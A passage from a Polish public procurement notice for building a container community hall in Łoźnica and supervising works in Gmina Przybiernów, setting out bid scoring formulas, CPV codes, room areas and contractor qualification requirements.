oceny w obrębie danego kryterium wynosi 40,00 pkt.<br/>Ocena ofert zostanie przeprowadzona w oparciu o przedstawione niżej wzór w oparciu o zaoferowany okres gwarancji i rękojmi,<br/>który należy podać w miesiącach w formularzu ofertowym (zał. nr 1 do SWZ):<br/>Gbad<br/>Wartość punktowa (G) = -------------------------------- x Max (G)<br/>Gmax<br/>gdzie:<br/>Gmax – najdłuższy okres gwarancji i rękojmi spośród wszystkich ofert<br/>Gbad – okres gwarancji i rękojmi podany w ofercie badanej<br/>Max(G) - maksymalna ilość punktów, jakie może otrzymać oferta za kryterium wydłużenie okresu gwarancji i rękojmi (tj. 40 pkt)<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium.<br/>Oferta wypełniająca w najwyższym stopniu wymagania określone kryterium otrzyma maksymalną ilość punktów. Pozostałym<br/>Wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) ilość<br/>punktów.<br/>Wymagany minimalny przez Zamawiającego okres gwarancji i rękojmi wynosi 60 miesięcy. Maksymalny okres gwarancji i rękojmi<br/>wynosi 84 miesięcy.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 84 miesięcy do oceny ofert zostanie przyjęty okres 84 miesięcy. Brak<br/>wskazania w ofercie (w formularzu ofertowym) okresu gwarancji będzie równoznaczny z zaoferowaniem 60 miesięcy, za które<br/>Wykonawca otrzyma 0 pkt.<br/>W przypadku gdy Wykonawca, który zaoferuje okres gwarancji krótszy niż 60 miesięcy oferta Wykonawcy zostanie odrzucona na<br/>podstawie art. 226 ust. 1 pkt 5) ustawy Pzp jako oferta, której treść jest niezgodna z warunkami zamówienia.<br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>Łączna wartość punktowa = wartość punktowa „C” (cena oferty) + wartość punktowa „G” (wydłużenie okresu gwarancji i rękojmi)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji i rękojmii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.	Przedmiotem zamówienia jest realizacja zadania prowadzonego pod nazwą: Poprawa stanu bazy kulturalno-turystycznej w Gminie Przybiernów realizowana w częściach: Część nr 2 – Budowa świetlicy kontenerowej w Łoźnicy<br/>5.2.	w tym wykonanie wszystkich prac prowadzących do osiągnięcia stanu zgodnego z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, SWZ oraz projektowanymi postanowieniami umowy w sprawie zamówienia publicznego.<br/><br/>5.3.	Zamówienie jest realizowane w częściach, na które wykonawca może złożyć osobne oferty. Dla potrzeb porządkowych każda z części będzie nosić nazwy:<br/><br/><br/>2)	Część nr 2<br/>Poprawa stanu bazy kulturalno-turystycznej w Gminie Przybiernów w częściach: Część nr 2 – Budowa świetlicy kontenerowej w Łoźnicy<br/>Oznaczenie CPV:<br/>CPV- 44211100-3 Budynki modułowe i przenośne<br/><br/>CPV-45200000-9 Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej<br/>CPV- 45300000-0 Roboty instalacyjne w budynkach<br/>CPV- 45300000-0	Roboty w zakresie instalacji budowlanych<br/>CPV- 45310000-3	Roboty w zakresie instalacji elektrycznych<br/>CPV- 45332000-3 Roboty instalacyjne wodne i kanalizacyjne <br/>CPV- 45311100-1	Roboty w zakresie okablowania elektrycznego<br/>CPV- 45311200-2	Roboty w zakresie przewodów instalacji elektrycznej<br/>CPV- 45314300-4	Instalowanie infrastruktury kablowej<br/>CPV- 45314310-7	Układanie kabli<br/>CPV- 45315700-5	Instalowanie rozdzielni elektrycznych<br/>CPV- 45317300-5	Elektryczne elektrycznych urządzeń rozdzielczych<br/><br/><br/><br/>Przedmiotem opracowania jest budowa świetlicy kontenerowej wraz z zagospodarowaniem terenu oraz niezbędną infrastrukturą techniczną w Łoźnicy oraz uzyskanie ostatecznego pozwolenia na użytkowanie obiektu.<br/>Zakres projektu dotyczy:<br/>- budowy budynku świetlicy z 6 modułów kontenerowych wraz z wyposażeniem z dostosowaniem obiektu do korzystania osób niepełnosprawnych<br/>- obsługi komunikacyjnej obiektu w formie dojazdu do budynku z miejscami postojowymi, ciągami komunikacyjnymi oraz placem stycznym do przedmiotowego budynku<br/>- wydzielenia miejsca na gromadzenie odpadów stałych<br/>- wykonania ogrodzenia wokół terenu inwestycji<br/>- wykonania infrastruktury technicznej wewnątrz oraz na zewnątrz budynku wraz z oświetleniem zewnętrznym<br/><br/>Uwaga! Projekt został pomniejszony o część ujętą w poprzednim postępowaniu tj. zagospodarowanie terenu (plac zabaw, mała architektura). Przedmiar został pomniejszony o odpowiednie pozycje.<br/><br/>Zestawienie pomieszczeń:<br/><br/>kondygnacja – parter/ H=2,50m<br/>Lp	Nr <br/>pomieszczenia	Nazwa pomieszczenia	Powierzchniam² <br/><br/>1	0.1	SALA 1	40,98<br/>2	0.2	SALA 2	27,13<br/>3	0.3	ZAPLECZE ŚWIETLICY	5,17<br/>4	0.4	TOALETA	10,22<br/> RAZEM	<br/>81,10<br/>	<br/><br/>Parametry:<br/>Długość max. budynku – 14,63m<br/>Szerokość max. budynku – 6,06m<br/>Wys. budynku – max. 5,33m- kalenica, max.3,21m- okap<br/>Powierzchnia zabudowy - 89m2 <br/>Powierzchnia użytkowa – 81,10 m2<br/>Kubatura budynku ok. 203m³<br/>Wysokość kondygnacji: 2,50m </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44211100-3 - Budynki modułowe i przenośne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <p class="mb-0">45314310-7 - Układanie kabli</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">380 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla Części nr 1<br/>1) cena oferty (C) 60% 60 punktów<br/>2) wydłużenie okresu gwarancji i rękojmi (G) 40% 40 punktów<br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie wszystkich kryterium =100 pkt.<br/>W odniesieniu do wykonawców, których oferty nie podlegają odrzuceniu dokonana zostanie ocena oferty w następujący sposób:<br/>ad. 1) Sposób obliczenia punktów dla kryterium cena oferty (C):<br/>W kryterium cena oferty największą liczbę punktów uzyska oferta z najniższą ceną (brutto).<br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/>Cmin<br/>Wartość punktowa „C” = -------------------------------- x Max(C)<br/>Cbad<br/>gdzie:<br/>Cmin - cena brutto najniższa spośród wszystkich ofert<br/>Cbad - cena brutto podana w ofercie badanej<br/>Max(C) - maksymalna ilość punktów, jakie może otrzymać oferta za kryterium cena oferty (tj. 60 pkt)<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium.<br/>Oferta wypełniająca w najwyższym stopniu wymagania określone kryterium otrzyma maksymalną ilość punktów. Pozostałym<br/>Wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) ilość<br/>punktów.<br/>Ad 2) Sposób obliczenia punktów dla kryterium wydłużenie okresu gwarancji i rękojmi (G):<br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 40,00 pkt.<br/>Ocena ofert zostanie przeprowadzona w oparciu o przedstawione niżej wzór w oparciu o zaoferowany okres gwarancji i rękojmi,<br/>który należy podać w miesiącach w formularzu ofertowym (zał. nr 1 do SWZ):<br/>Gbad<br/>Wartość punktowa (G) = -------------------------------- x Max (G)<br/>Gmax<br/>gdzie:<br/>Gmax – najdłuższy okres gwarancji i rękojmi spośród wszystkich ofert<br/>Gbad – okres gwarancji i rękojmi podany w ofercie badanej<br/>Max(G) - maksymalna ilość punktów, jakie może otrzymać oferta za kryterium wydłużenie okresu gwarancji i rękojmi (tj. 40 pkt)<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium.<br/>Oferta wypełniająca w najwyższym stopniu wymagania określone kryterium otrzyma maksymalną ilość punktów. Pozostałym<br/>Wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) ilość<br/>punktów.<br/>Wymagany minimalny przez Zamawiającego okres gwarancji i rękojmi wynosi 60 miesięcy. Maksymalny okres gwarancji i rękojmi<br/>wynosi 84 miesięcy.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 84 miesięcy do oceny ofert zostanie przyjęty okres 84 miesięcy. Brak<br/>wskazania w ofercie (w formularzu ofertowym) okresu gwarancji będzie równoznaczny z zaoferowaniem 60 miesięcy, za które<br/>Wykonawca otrzyma 0 pkt.<br/>W przypadku gdy Wykonawca, który zaoferuje okres gwarancji krótszy niż 60 miesięcy oferta Wykonawcy zostanie odrzucona na<br/>podstawie art. 226 ust. 1 pkt 5) ustawy Pzp jako oferta, której treść jest niezgodna z warunkami zamówienia.<br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>Łączna wartość punktowa = wartość punktowa „C” (cena oferty) + wartość punktowa „G” (wydłużenie okresu gwarancji i rękojmi)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji i rękojmii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja zadania prowadzonego pod nazwą: Poprawa stanu bazy kulturalno-turystycznej w Gminie Przybiernów realizowana w częściach: Część nr 3 - nadzór inwestorski<br/>5.2.<br/>w tym wykonanie wszystkich prac prowadzących do osiągnięcia stanu zgodnego z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, SWZ oraz projektowanymi postanowieniami umowy w sprawie zamówienia publicznego.<br/>5.3.<br/>Zamówienie jest realizowane w częściach, na które wykonawca może złożyć osobne oferty. Dla potrzeb porządkowych każda z części będzie nosić nazwy:<br/><br/>3)	Część nr 3 – <br/>Poprawa stanu bazy kulturalno-turystycznej w Gminie Przybiernów realizowana w częściach: Część nr 3 – Nadzór inwestorski<br/> <br/>Oznaczenie CPV: <br/>71240000-2 Usługi architektoniczne, inżynieryjne i planowania<br/>71247000-1 Nadzór na robotami budowlanymi<br/><br/><br/>5.4.	Szczegółowy przedmiot zamówienia dla poszczególnych części zamówienia określają zapisy treści SWZ w tym załączniki zawierające projektowane postanowienia przyszłej umowy oraz n/w załączniki do SWZ <br/><br/>a)	Załącznik nr 10 do SWZ – Dokumentacja projektowa dla części nr 1 – Termomodernizacja Czarnogłowy Projekt STWIORB<br/>b)	Załącznik nr 11 do SWZ – Dokumentacja projektowa dla części nr 1 – Termomodernizacja Brzozowo Projekt, STWIORB<br/>c)	Załącznik nr 12 do SWZ – Dokumentacja projektowa dla części nr 1 – Termomodernizacja Moracz Projekt STWIORB<br/>d)	Załącznik nr 13 do SWZ – Dokumentacja projektowa dla części nr 1 – Termomodernizacja Czarnogłowy, Brzozowo, Moracz Przedmiary <br/>e)	Załącznik nr 14 do SWZ – Dokumentacja projektowa dla części nr 1 – Rokita Projekt architektoniczno-budowlany<br/>f)	Załącznik nr 15 do SWZ – Dokumentacja projektowa dla części nr 1 – Rokita Branża konstrukcyjna STWIORB, przedmiar<br/>g)	Załącznik nr 16 do SWZ – Dokumentacja projektowa dla części nr 1 – Rokita branża elektryczna STWIORB, przedmiar<br/>h)	Załącznik nr 17 do SWZ – Dokumentacja projektowa dla części nr 1 – Rokita branża sanitarna STWIORB, przedmiar<br/>i)	Załącznik nr 18 do SWZ – Dokumentacja projektowa dla części nr 2 – Projekt Architektoniczno-Budowlany<br/>j)	Załącznik nr 19 do SWZ – Dokumentacja projektowa dla części nr 2 – Projekt Techniczny Konstrukcja, STWIORB, Przedmiar<br/>k)	Załącznik nr 20 do SWZ – Dokumentacja projektowa dla części nr 2 – Projekt Techniczny Elektryka, STWIORB, Przedmiar<br/>l)	Załącznik nr 21 do SWZ – Dokumentacja projektowa dla części nr 2 – Projekt Techniczny Sanitarny, STWIORB, Przedmiar<br/>m) Załącznik nr 22 do SWZ - Uzgodnienia<br/><br/><br/><br/>Załączniki określone w w/w punktach a) – m ) określają dla części nr 1,2 zakres niezbędnych robót budowlanych celem realizacji przedmiotu zamówienia dla części 1,2 a dla części nr 3 zakres, który będzie przedmiotem nadzoru inwestorskiego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">380 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla Części nr 3<br/>1) cena oferty (C) 60% 60 punktów<br/>2) Doświadczenie inspektora o specjalności konstrukcyjnej 20% 20 punktów<br/>3) Doświadczenie inspektora o specjalności sanitarnej 20% 20 punktów<br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie wszystkich kryterium =100 pkt.<br/>W odniesieniu do wykonawców, których oferty nie podlegają odrzuceniu dokonana zostanie ocena oferty w następujący sposób:<br/>ad. 1) Sposób obliczenia punktów dla kryterium cena oferty (C):<br/>W kryterium cena oferty największą liczbę punktów uzyska oferta z najniższą ceną (brutto).<br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/>Cmin<br/>Wartość punktowa „C” = -------------------------------- x Max(C)<br/>Cbad<br/>gdzie:<br/>Cmin - cena brutto najniższa spośród wszystkich ofert<br/>Cbad - cena brutto podana w ofercie badanej<br/>Max(C) - maksymalna ilość punktów, jakie może otrzymać oferta za kryterium cena oferty (tj. 60 pkt)<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium.<br/>Oferta wypełniająca w najwyższym stopniu wymagania określone kryterium otrzyma maksymalną ilość punktów. Pozostałym<br/>Wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) ilość<br/>punktów.<br/>Ad 2) Sposób obliczenia punktów dla kryterium doświadczenie inspektora o specjalności konstrukcyjnej (IK):<br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 20,00 pkt.<br/>Ocena ofert zostanie przeprowadzona w oparciu o przedstawiony niżej sposób tylko w sytuacji gdy wykonawca w ofercie wskaże<br/>odpowiednią osobę oświadczając/podając jednocześnie wielkość doświadczenia w latach:<br/>1. Za 3 letnie doświadczenie inspektora o specjalności konstrukcyjnej wykonawca uzyska - 5 pkt<br/>2. Za 6 letnie doświadczenie inspektora o specjalności konstrukcyjnej wykonawca uzyska - 10 pkt<br/>3. Za 9 letnie doświadczenie inspektora o specjalności konstrukcyjnej wykonawca uzyska - 15 pkt<br/>4. Za 12 letnie doświadczenie inspektora o specjalności konstrukcyjnej wykonawca uzyska - 20 pkt<br/>Ad 3) Sposób obliczenia punktów dla kryterium doświadczenie inspektora o specjalności sanitarnej (IS):<br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 20,00 pkt.<br/>Ocena ofert zostanie przeprowadzona w oparciu o przedstawiony niżej sposób tylko w sytuacji gdy wykonawca w ofercie wskaże<br/>odpowiednią osobę oświadczając/podając jednocześnie wielkość doświadczenia w latach:<br/>1. Za 3 letnie doświadczenie inspektora o specjalności sanitarnej wykonawca uzyska - 5 pkt<br/>2. Za 6 letnie doświadczenie inspektora o specjalności sanitarnej wykonawca uzyska - 10 pkt<br/>3. Za 9 letnie doświadczenie inspektora o specjalności sanitarnej wykonawca uzyska - 15 pkt<br/>4. Za 12 letnie doświadczenie inspektora o specjalności sanitarnej wykonawca uzyska - 20 pkt<br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>Łączna wartość punktowa = wartość punktowa „C” (cena oferty) + wartość punktowa „IK” + wartość punktowa „IS”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie inspektora o specjalności sanitarnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Część nr 1 - wykonanie robót budowlanych<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>4) zdolności technicznej lub zawodowej<br/>a) O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie<br/>doświadczenia, tj. że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali<br/>należycie co najmniej dwie roboty budowlane polegające na wykonaniu termomodernizacji budynku, tj. dociepleniu ścian<br/>każda o wartości robót budowlanych nie mniejszej niż 100 000,00 zł łącznie z podatkiem VAT (każda z tych robót). Przez<br/>jedną robotę Zamawiający rozumie zamówienie realizowane na podstawie jednej umowy,<br/>Wykonawca nie może sumować wartości kilku robót budowlanych o mniejszym zakresie dla uzyskania wymaganych<br/>wartości porównywalnych.<br/>Wykonawca nie może sumować wartości kilku robót budowlanych o mniejszym zakresie dla uzyskania wymaganych<br/>wartości porównywalnych dla jednej z w/w branż.<br/>1.1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie<br/>dysponowania następującymi osobami zdolnymi do wykonania zamówienia:<br/>a) co najmniej jedną osobą pełniącą funkcję Kierownika Budowy - minimalne wymagania:<br/>kwalifikacje zawodowe: uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi odpowiadające<br/>przedmiotowi zamówienia w specjalności inżynieryjnej konstrukcyjno budowlanej w rozumieniu ustawy z dnia 7 lipca 1994 r.<br/>Prawo budowlane<br/>b) co najmniej jedną osobą pełniącą funkcję Kierownika Budowy - minimalne wymagania:<br/>kwalifikacje zawodowe: uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi odpowiadające<br/>przedmiotowi zamówienia w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych w rozumieniu<br/>ustawy z dnia 7 lipca 1994 r. Prawo budowlane<br/>c) co najmniej jedną osobą pełniącą funkcję Kierownika robót elektroenergetycznych - minimalne wymagania:<br/>kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń odpowiadające<br/>przedmiotowi zamówienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane Połączenie stanowisk, o których mowa<br/>w ppkt 1.1 lit. a) – c) możliwe jest tylko pod warunkiem spełnienia łącznie wymagań dotyczących kwalifikacji.<br/>13.2.2 Część nr 2 - wykonanie robót budowlanych<br/>4) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>5) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>6) sytuacji ekonomicznej lub finansowejZamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>4) zdolności technicznej lub zawodowej<br/>a) O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie<br/>doświadczenia, tj. że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali<br/>należycie co najmniej jedną robotę budowlaną polegającą na budowie lub/i przebudowie lub/i rozbudowie obiektu<br/>kubaturowego o kubaturze nie mniejszej niż 70 m² wraz z wykonaniem instalacji wewnętrznych (tj. elektryczną, wod. - kan.,<br/>ogrzewania) oraz z wykonaniem instalacji zewnętrznych (tj. elektryczną, wod. – kan.) o wartości robót budowlanych nie<br/>mniejszej niż 300 000,00 zł łącznie z podatkiem VAT).<br/>Wykonawca nie może sumować wartości kilku robót budowlanych o mniejszym zakresie dla uzyskania wymaganych<br/>wartości porównywalnych.<br/>1.2. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie<br/>dysponowania następującymi osobami zdolnymi do wykonania zamówienia:<br/>a) Kierownik budowy w specjalności konstrukcyjno-budowlanej – minimalne wymagania:<br/> kwalifikacje zawodowe: uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi odpowiadające<br/>przedmiotowi zamówienia w specjalności konstrukcyjno - budowlanej w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo<br/>budowlane<br/>b) Kierownik robót budowlanych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych – minimalne wymagania:<br/> kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi odpowiadające przedmiotowi<br/>zamówienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane<br/>c) Kierownik robót budowlanych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych – minimalne wymagania:<br/> kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi odpowiadające przedmiotowi<br/>zamówienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w<br/>rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. 2024 r. poz. 725 ze zm.) lub odpowiadające im<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>Połączenie stanowisk, o których mowa w ppkt 1.1 lit. a) – c) możliwe jest tylko pod warunkiem spełnienia łącznie wymagań<br/>dotyczących kwalifikacji.<br/>13.2.3 Część nr 3 - nadzór inwestorski<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie<br/>warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>4) zdolności technicznej lub zawodowej<br/>a) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie<br/>doświadczenia tj., że: w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wykonali należycie: co najmniej dwie usługi polegające na nadzorowaniu robót<br/>budowlanych obejmujących swoim zakresem:<br/>budowę lub/i przebudowę lub/i rozbudowę obiektu kubaturowego o funkcji: socjalnej lub/i edukacyjnej lub/i opiekuńczej lub/i<br/>mieszkalnej lub/i biurowej wraz z wykonaniem instalacji wewnętrznych (elektrycznej, wod-kan.– każda z tych robót) o<br/>wartości co najmniej 200 000,00 zł każda.<br/>5) O udzielenie 